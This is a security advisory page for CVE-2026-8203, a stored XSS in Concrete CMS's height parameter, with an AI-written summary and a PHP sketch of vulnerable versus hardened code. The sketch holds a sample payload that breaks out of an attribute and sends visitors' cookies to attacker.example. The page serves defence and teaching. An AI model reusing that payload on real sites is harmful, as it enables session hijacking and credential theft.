VYPR
High severity · NVD Advisory · Published May 21, 2026

CVE-2026-8203

Description

Concrete CMS 9.5.0 and below has Stored XSS on the height parameter. The controller does not validate or sanitize $height. Any user with editor privileges can inject malicious JavaScript that executes in the context of any visitor's browser, potentially leading to session hijacking, credential theft, or other malicious actions. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Alfin Joseph for reporting.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Concrete CMS ≤9.5.0 has stored XSS in the height parameter, allowing editors to inject JavaScript that can hijack sessions or steal credentials.

Vulnerability Overview

CVE-2026-8203 is a stored cross-site scripting (XSS) vulnerability in Concrete CMS versions 9.5.0 and below. The root cause lies in the controller handling the height parameter, which performs no validation or sanitization of user-supplied input. This allows any user with editor privileges to inject arbitrary JavaScript code that is stored and later executed in the context of visitors' browsers [1].

Attack Surface and Exploitation

The attacker must already hold editor privileges; no special network position is required (AV:N). The vulnerable parameter is stored without sanitization and later rendered into the page, so the injected script runs in the browser of any visitor who loads the affected page. The CVSS v4.0 score of 7.3 (AV:N/AC:H/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H) reflects the high privileges required (PR:H), high attack complexity and an attack precondition (AC:H, AT:P), and passive user interaction (UI:P, meaning a victim only needs to view the page rather than be tricked into an action), set against high impact on the confidentiality, integrity and availability of the vulnerable system [1].

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any visitor who loads the page containing the stored payload, including higher-privileged users such as administrators. This can lead to session hijacking, theft of credentials, or other malicious actions that compromise user accounts and data [1].

Mitigation

Concrete CMS version 9.5.1 addresses this vulnerability by sanitizing the height parameter. Users are strongly advised to upgrade to 9.5.1 or later. No workaround is documented for older versions [1].
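The root cause described under Vulnerability Overview and the fix described under Mitigation both come down to one pattern: an editor-supplied height value written into markup without being validated as a number. The following is an added, standalone PHP sketch of that pattern beside a hardened version; it is not Concrete CMS code, and the function names, the block markup, the parameter handling and the sample payload are all hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not Concrete CMS code: a standalone PHP sketch of the bug
// class in CVE-2026-8203. Function names, the block markup and the sample
// payload are hypothetical.

/**
 * Vulnerable pattern: the editor-supplied height is written straight into
 * the block's markup. A value such as
 *     100"><script>...</script><div x="
 * closes the style attribute and the script runs for every visitor.
 */
function renderBlockVulnerable(array $formData): string
{
    $height = $formData['height'] ?? '300';
    return '<div class="block" style="height: ' . $height . 'px"></div>';
}

/**
 * Hardened pattern: height is a bounded integer, so validate it as one and
 * fall back to a default on anything else. Escaping on output is kept as a
 * second layer in case the validation is weakened later.
 */
function sanitizeHeight(mixed $raw, int $default = 300, int $min = 1, int $max = 5000): int
{
    // FILTER_VALIDATE_INT rejects "100abc", "1e3", "<script>", null and
    // out-of-range values; it returns false on failure.
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return $value === false ? $default : $value;
}

function renderBlockHardened(array $formData): string
{
    $height = sanitizeHeight($formData['height'] ?? null);
    // htmlspecialchars on an already-validated int is belt-and-braces;
    // Concrete CMS exposes the same escaping through its h() helper.
    $escaped = htmlspecialchars((string) $height, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="block" style="height: ' . $escaped . 'px"></div>';
}

// Constructed sample: what a malicious editor would submit in the block form.
$payload = [
    'height' => '100"><script>fetch("https://attacker.example/?c=" + document.cookie)</script><div x="',
];

echo "vulnerable: ", renderBlockVulnerable($payload), PHP_EOL;
echo "hardened:   ", renderBlockHardened($payload), PHP_EOL;
echo "hardened (valid input 250): ", renderBlockHardened(['height' => '250']), PHP_EOL;
```

Run with PHP 8 or later. The first line shows the attribute breakout and the injected script element in the rendered markup; the second shows the same payload collapsing to the 300px default; the third shows a legitimate value passing through. The point of validating the type rather than only escaping is that a height has a narrow legitimate shape, so an allow-list (a bounded integer) removes the attack surface entirely instead of relying on escaping to be applied correctly in every rendering path.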

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

References: 1

News mentions: 0 (no linked articles in our index yet)